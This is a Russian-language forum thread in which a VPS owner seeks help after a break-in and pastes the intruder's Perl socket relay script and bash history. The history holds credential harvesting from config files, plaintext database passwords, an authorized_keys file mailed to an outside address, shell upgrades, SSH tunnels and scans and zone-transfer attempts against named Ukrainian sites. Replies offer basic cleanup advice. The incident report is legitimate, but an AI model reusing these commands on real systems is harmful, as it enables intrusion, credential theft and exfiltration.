Форум программистов, компьютерный форум, киберфорум
Безопасность сайтов и серверов
Войти
Регистрация
Восстановить пароль
 
Рейтинг 4.50/6: Рейтинг темы: голосов - 6, средняя оценка - 4.50
0 / 0 / 0
Регистрация: 18.12.2014
Сообщений: 3
1

Взломали сайт и используют для взлома других сайтов :(

07.01.2015, 10:37. Показов 1246. Ответов 6
Метки нет (Все метки)

Имеется VPS.
В ATOP Заметил что выросла нагрузка на проц и память.
В процессах увидел Python.

Залез в папку пользователя, там кроме

conf/
mail/
tmp/
web/

.bash_history

Увидел папку .shh с ключами и файл psock-server.pl

Perl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
use IO::Socket;
 
my $port = 15793;
 
 
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
 
my $paddr = sockaddr_in($port, INADDR_ANY);
bind(SOCK, $paddr);
 
listen(SOCK, 2);
while (my $client_addr = accept(CLIENT, SOCK)) {
$comm=<STDIN>;
chomp $comm;
print CLIENT $comm;
@otvet=<CLIENT>;
foreach $ostr(@otvet)
{
print $ostr;
}
undef @otvet;
}
Bash история вот такая:

Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
id
su root
pwd
sudo id
ls
cd public_html
ls
more index.php
passwd
ssh -l #user# localhost
bash
bash
ls
cd public_html
vi index.php
python -c "import pty; pty.spawn('/bin/sh');"
python -c "import pty; pty.spawn('/bin/sh');"
id
cd /home/#user#
ls
cd conference
cd conf
ls
cd web
ls
ls -al
cd /home/#user#
cd web
ls
cd site.ru
ls
cd public_html
ls
grep mysql_connect *
grep pf31KcqBUf *
sudo -i
cd /home
ls
su
cd backup
ls
cat /etc/crontab
cd ../#user#
ls
ls -al
cat .bash_history
ssh -l #user# localhost
passwd
ls
cd web
ls
cd site.ru
cd tox
ls
cd public_html/tox
ls
cat conf_global.php
grep pass conf_global.php
cd /home/root
cd /root
ls
cd /
ls
cd backup
ls
cd /var
ls
cd www
ls
cd html
ls
su apache
su apache
cd /home
ls
cat text.txt
cd ..
pwd
cd tox
grep pass *
grep pass conf_global.php
grep pf31KcqBUf *
grep sql conf_global.php
mysql -u root
mysql -u root --password=pf31KcqBUf
nc localhost 21
python -c "import pty; pty.spawn('/bin/sh');"
su
sudo -i
pwd
cd ..
grep -r pngfix2 *
old_text_news.tpl
mv mьмапп
pwd
cd templates
grep pngfix2 *
python -c "import pty; pty.spawn('/bin/sh');"
pwd
cd ../../template
cd ../../templates
ls
vi header.tpl
clear
cat index.tpl
more index.tpl
clear
more index.tpl
python -c "import pty; pty.spawn('/bin/sh');"
nmap stv.ua
smbclient -L stv.ua
ÿñperl -e "use LWP;"
ÿñÿñnc stv.ua 445
sudo id
ÿñnc -l -n -v -p 15793
pwd
cd ..
ls
more conf_global.php
grep pf31XcqBUf *
grep pf31KcqBUf *
su
sudo -i
cd /etc
ls cron.daily
ls cron.hourly
ls crontab.d
ls|grep cron
ls cron.d
cat crontab
ÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñ
id
ÿñÿñÿñÿñÿñÿñcd /var/spool
cd
cd /var/spool
ls
cd cron
ls -al
ÿñcd /tmp
cat /tmp/tmp.cron
find / -name config.inc.php 2>/dev/null
cd /usr/share/roundcubemail/plugins/password
ls
more config.inc.php
 
id
python -c "import pty; pty.spawn('/bin/sh');"
python -c "import pty; pty.spawn('/bin/sh');"
python -c "import pty; pty.spawn('/bin/sh');"
python -c "import pty; pty.spawn('/bin/sh');"
ls|grep authorized_keys
ÿñÿñÿñÿñÿñ
mail -a authorized_keys [email]hirohito87@mail.ru[/email]
ÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñ
ssh [email]admin@history.org.ua[/email]
ssh [email]root@history.org.ua[/email]
ssh [email]www@history.org.ua[/email]
ssh [email]admin@history.org.ua[/email]
ÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñÿñ
ssh [email]admin@history.org.ua[/email]
ssh-keygen
pwd
ÿñcp /home/#user#/.ssh/id_rsa.pub id_rsa.pub
ÿñcp /home/#user#/.ssh/id_rsa.pub id_rsa.pub
cat /home/#user#/.ssh/id_rsa.pub
cat /home/#user#/.ssh/id_rsa.pub >authorized_keys
ÿñssh [email]root@history.org.ua[/email]
ssh [email]root@history.org.ua[/email]
ÿñÿñÿñÿñÿñssh [email]admin@history.org.ua[/email]
ÿñÿñÿñÿñÿñssh [email]admin@history.org.ua[/email]
ssh [email]admin@history.org.ua[/email]
man crypt
man sha512sum
clear
man sha512pass
ÿñÿñÿñÿñÿñssh
ssh [email]history@history.org.ua[/email]
ssh [email]www@history.org.ua[/email]
date
ÿñ
su
cd
setenv
cd /home/.ssh
cd /home/#user#
set HOME=/home/#user#
cd
cd
ÿñ
set HOME=/home/#user#
cd
set $HOME=/home/#user#
cd
ssh stv.ua
ssh [email]fedor@stv.ua[/email]
ssh [email]root@stv.ua[/email]
printenv HOME
printenv $HOME
set HOME="/home/#user#"
printenv
cd /home/.ssh
cd /home/#user#/.ssh
Ls
ls
cat known_hosts
ÿñ
cat id_rsa.pub
sh
ssh [email]admin@history.org.ua[/email]
crypt
man crypt
sha512sum
find / -name *.sh 2>/dev/null
cd /home/#user#/web/site.ru
cd ../site.ru!
Ls
ls
python -c "import pty; pty.spawn('/bin/sh');"
cd /home/#user#
ls
cd conf
Ls
ls
cd mail
ls
cd ../web
ls
cd ../..
ls
cd ..
ls
find / -name *.php 2>/dev/null
ÿñgrep pass /etc/phpMyAdmin/config.inc.php
more /etc/roundcubemail/db.inc.php
more /etc/roundcubemail/db.inc.php
more /etc/roundcubemail/db.inc.php
mysql -u roundcube --password=Krl0u3K2Ub
mysql -u root
more /etc/roundcubemail/db.inc.php
more /etc/phpMyAdmin/config.inc.php
mysql -u pma --password=pmapass
ls
cd backup
ls
cat /etc/crontab
last
su
cd /home/#user#
Ls
ls
cd web/site.ru/
ls
cd public_html/tox
ls
more conf_global.php
sudo id
su
cd /root
find / -name shadow 2>/dev/null
find / -name *.pl 2>/dev/null
perl -e "use LWP;"
perl -e "use Http::Cookies;"
perl -e "use Http::Cookie;"
perl -e "use HTTP::Cookies;"
ÿñssh [email]fedor@stv.ua[/email]
python -c "import pty; pty.spawn('/bin/sh');"
python -c "import pty; pty.spawn('/bin/sh');"
dig nuczu.edu.ua
nslookup books.nuczu.edu.ua
ÿñdig
dig fxeuroclub.ru AXFR
dig fxeuroclub.ru
dig -t sa fxeuroclub.ru
dig -t soa nuczu.edu.ua
dig -t axfr @univer.nuczu.edu.ua nuczu.edu.ua
dig fxeuroclub.ru SOA
dig @ns1.fxeuroclub.ru fxeuroclub.ru AXFR
ÿñ
nc nuczu.edu.ua 21
nc
ls
cd /home/#user#
ls
perl psock-server.pl
python -c "import pty; pty.spawn('/bin/sh');"
dig -t soa kharkivoda.gov.ua
dig @ns.kharkivoda.gov.ua kharkivoda.gov.ua AXFR
nmap
jKnh3uN4
python -c "import pty; pty.spawn('/bin/sh');"
python -c "import pty; pty.spawn('/bin/sh');"
ssh -f -N -R 15794:site.ru:22 #user#@site.ru
cd /home/#user#/.ssh
grep #user# /etc/passwd
ssh-keygen
cd /home/#user#/.ssh
cat id_rsa.pub >authorized_keys
ssh -f -N -L 4080:site.ru:22 #user#@site.ru
python -c "import pty; pty.spawn('/bin/sh');"
cd /home/#user#
ls
perl psock-server.pl
python -c "import pty; pty.spawn('/bin/sh');"
Насколько понимаю, хаккер пытается с моего сервака ломать украинские сайты.
Как бы ему прикрыть доступ? Не очень понимаю как он попадает на сервер. FTP пароль сменил.
0
Programming
Эксперт
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
07.01.2015, 10:37
Ответы с готовыми решениями:

Все ссылки на сайт с 2-5 других сайтов.
Такой вопрос: у меня есть возможность размещать тематические статьи на 2-5 сайтах совершенно...

Почему для активной разработки сайтов не используют C# под Web
Почему для активной разработки сайтов не используют C# под Web, ASP.NET ?

Не открывается сайт myzuka.org и затруднена загрузка других сайтов
При открытии сайта myzuka.org браузер выкидывает сообщение: / Этот сайт не может обеспечить...

Сайт после 5 секунд заходит на другой сайт (взломали сайт)
Когда я открою свое сайт он после 5 секунд заходит на другой сайт (взломали сайт) там написано что...

__________________
6
990 / 514 / 102
Регистрация: 19.03.2013
Сообщений: 3,113
Записей в блоге: 19
07.01.2015, 10:41 2
trawen, возможно он залил бекдор и через него ходит на ваш сайт. Как найти - хз. Как вариант - посмотреть по дате создания файлы, если он дату у залитого файла не поменял - то можно найти.
0
0 / 0 / 0
Регистрация: 18.12.2014
Сообщений: 3
07.01.2015, 10:48  [ТС] 3
А как-то можно запретить этому юзеру исполнять питон скрипты?

вот это что бы он не мог делать - python -c "import pty; pty.spawn('/bin/sh');"
0
990 / 514 / 102
Регистрация: 19.03.2013
Сообщений: 3,113
Записей в блоге: 19
07.01.2015, 13:13 4
trawen, советую пойти с этим вопросом на "форум по безопасности"
Ссылку дать не могу, ищите по запросу "форум безопасность хакер"

Там вам быстрее помогут. Ну или пошлют Но здесь вы ответа не дождетесь вразумительного. Инфа 146%
0
Администратор
11895 / 5199 / 263
Регистрация: 05.04.2011
Сообщений: 13,961
Записей в блоге: 2
07.01.2015, 20:48 5
Цитата Сообщение от chizz Посмотреть сообщение
Но здесь вы ответа не дождетесь вразумительного
Это еще почему?

trawen, на чем сайт сделан? Воспользуйтесь скриптом айболит.
0
1362 / 1074 / 110
Регистрация: 16.03.2012
Сообщений: 4,549
07.01.2015, 22:13 6
Если это впс, то у вас должен быть доступ по ssh. Для начала смените его. Пройдитесь малдетом каким-нить, чруткитом.
0
72 / 75 / 4
Регистрация: 05.11.2012
Сообщений: 471
Записей в блоге: 1
12.01.2015, 11:59 7
Как правильно устранить взлом можете найти в следующей статье.
0
IT_Exp
Эксперт
87844 / 49110 / 22898
Регистрация: 17.06.2006
Сообщений: 92,604
12.01.2015, 11:59

Заказываю контрольные, курсовые, дипломные работы и диссертации здесь.

Взломали несколько сайтов
Собствено троян угнал пароли от фтп и часть сайтов взломали где не успел сменить пароли, где сменил...

Статьи для других сайтов
Возник вопрос - как правильно выбирать статьи для других сайтов? Статью надо взять со своего сайта...

Взломали сайт?! Перенаправляет на левый сайт...
Доброго времени суток! Есть сайт, сегодня при входе на него, произошло перенаправление на левый...

Блокировка некоторых сайтов и программ которые используют сеть
Здравствуйте. Вирус блокирует большинство сайтов, так же некоторые программы которые используют...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
7
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2021, vBulletin Solutions, Inc.